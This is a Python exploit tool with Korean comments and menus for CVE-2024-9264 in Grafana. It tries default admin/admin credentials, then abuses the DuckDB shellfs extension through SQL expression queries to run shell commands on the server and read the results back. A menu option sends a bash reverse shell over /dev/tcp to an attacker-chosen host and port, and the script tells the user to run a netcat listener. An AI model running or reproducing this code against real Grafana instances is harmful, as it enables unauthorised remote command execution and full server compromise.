#!/usr/bin/env python3 import requests import sys import logging from psycopg2.extensions import adapt from typing import List, Optional, Any from colorama import Fore, init from packaging.version import Version, InvalidVersion init(autoreset=True) # ------------------------- # 프롤로그 # ------------------------- print(r""" _ __ _____ _____ _____ ___ | | / /|_ _|/ ___||_ _| / _ \ | |/ / | | \ `--. | | / /_\ \ | \ | | `--. \ | | | _ | | |\ \ _| |_ /\__/ / _| |_ | | | | \_| \_/ \___/ \____/ \___/ \_| |_/ Edited by : secKrity - 이민준 CVE ID : CVE-2024-9264 Affected product : Grafana Vulnerable version : prior to 11.0.5+security-01, prior to 11.0.6+security-01, prior to 11.1.6+security-01, prior to 11.1.7+security-01, prior to 11.2.1+security-01, prior to 11.2.2+security-01 """) # ------------------------- # 로깅 설정 # ------------------------- logging.basicConfig( filename="grafana_exploit.log", level=logging.INFO, format="%(asctime)s - %(message)s", ) def log_event(event: str, url: str = "", payload: str = ""): logging.info(f"EVENT={event} URL={url} PAYLOAD={payload}") # ------------------------- # 유틸: 컬러 출력 # ------------------------- def info(msg: str): print(Fore.YELLOW + "[*] " + msg) def success(msg: str): print(Fore.GREEN + "[+] " + msg) def vuln(msg: str): print(Fore.RED + "[-] " + msg) def error(msg: str): print(Fore.RED + "[!] " + msg) # ------------------------- # Grafana Exploit 클래스 # ------------------------- class GrafanaExploit: def __init__(self, base_url, user="admin", password="admin"): self.base_url = base_url.rstrip("/") self.session = requests.Session() self.user = user self.password = password def get_version(self) -> str: urls = ["/api/health", "/api/frontend/settings"] for path in urls: url = self.base_url + path try: r = self.session.get(url, timeout=5) log_event("version_check", url) if r.status_code == 200: data = r.json() if "version" in data: return data["version"] if "buildInfo" in data and "version" in data["buildInfo"]: return data["buildInfo"]["version"] except Exception as e: error(f"버전 확인 실패: {e}") return "Unknown" def login(self) -> bool: url = self.base_url + "/login" data = {"user": self.user, "password": self.password} try: r = self.session.post(url, json=data) log_event("login_attempt", url, str(data)) if r.status_code == 200 and "Logged in" in r.text: return True except Exception as e: error(f"로그인 실패: {e}") return False def run_query(self, query: str) -> Optional[List[Any]]: url = self.base_url + "/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101" payload = { "from": "1729313027261", "to": "1729334627261", "queries": [ { "datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"}, "expression": query, "hide": False, "refId": "B", "type": "sql", "window": "", } ], } try: r = self.session.post(url, json=payload) log_event("run_query", url, query) return r.json()["results"]["B"]["frames"][0]["data"]["values"] except Exception: return None def check_vuln(self): tmp_file = "/tmp/grafana_id" query = ( "SELECT 1;" "install shellfs from community;" "LOAD shellfs;" f"SELECT * FROM read_csv('id >{tmp_file} 2>&1 |')" ) self.run_query(query) return self.read_remote_file(tmp_file) def read_remote_file(self, filepath: str) -> Optional[bytes]: escaped_filename = adapt(filepath) query = f"SELECT content FROM read_blob({escaped_filename})" result = self.run_query(query) if result: content = result[0][0] try: decoded = content.encode("utf-8").decode("unicode_escape").encode("latin1") return decoded except Exception: return content.encode() return None def reverse_shell(self, lhost: str, lport: int): tmp_file = "/tmp/grafana_rs" cmd = f"bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\"" query = ( "SELECT 1;" "install shellfs from community;" "LOAD shellfs;" f"SELECT * FROM read_csv('{cmd} >{tmp_file} 2>&1 |')" ) self.run_query(query) return self.read_remote_file(tmp_file) # ------------------------- # 메뉴 실행 # ------------------------- def menu(): print("\n[ 메뉴 ]") print("1) 버전 탐색") print("2) 취약한 버전과 비교") print("3) 익스플로잇 (id 실행)") print("4) 리버스 셸 획득") print("5) 나가기") if __name__ == "__main__": if len(sys.argv) < 2: error(f"Usage: {sys.argv[0]} ") sys.exit(1) url = sys.argv[1] exploit = GrafanaExploit(url) while True: menu() choice = input(">> ") if choice == "1": info("Grafana 버전 확인 중...") ver = exploit.get_version() print("Grafana Version:", ver) elif choice == "2": info("취약 버전 리스트와 비교 중...") ver = exploit.get_version() print("현재 Grafana Version:", ver) # CVE-2024-9264 영향/패치 버전 목록 patched_versions = [ "11.0.5+security-01", "11.0.6+security-01", "11.1.6+security-01", "11.1.7+security-01", "11.2.1+security-01", "11.2.2+security-01", ] vulnerable_start = "11.0.0" try: curr = Version(ver) vs = Version(vulnerable_start) min_patched = min(Version(v) for v in patched_versions) if curr < vs: success(f"{ver} 은 11.0.0 이전 버전으로, CVE-2024-9264 영향 없음.") elif curr >= min_patched: success(f"{ver} 은 패치된 버전 이상입니다. 취약하지 않을 가능성이 높습니다.") else: vuln(f"{ver} 은 CVE-2024-9264에 취약합니다. 즉시 업그레이드 필요!") except InvalidVersion: error(f"버전 파싱 실패: {ver}") elif choice == "3": info("로그인 시도...") if exploit.login(): success("로그인 성공") info("PoC 실행 (id)...") output = exploit.check_vuln() if output: vuln("취약점 확인됨 (id 결과):") print(output.decode(errors="ignore")) else: success("취약점 동작 안 함") else: error("로그인 실패") elif choice == "4": info("리버스 셸 시도...") if exploit.login(): success("로그인 성공") lhost = input("공격자 IP (LHOST): ") lport = input("공격자 PORT (LPORT): ") try: lport = int(lport) info(f"리버스 셸 연결 시도 ({lhost}:{lport})") print(Fore.YELLOW + f"[!] 공격자 측에서 `nc -lvnp {lport}` 실행 중이어야 합니다.") exploit.reverse_shell(lhost, lport) vuln("리버스 셸 페이로드 전송 완료.") except Exception as e: error(f"리버스 셸 실행 오류: {e}") else: error("로그인 실패") elif choice == "5": info("프로그램 종료") break else: error("잘못된 입력")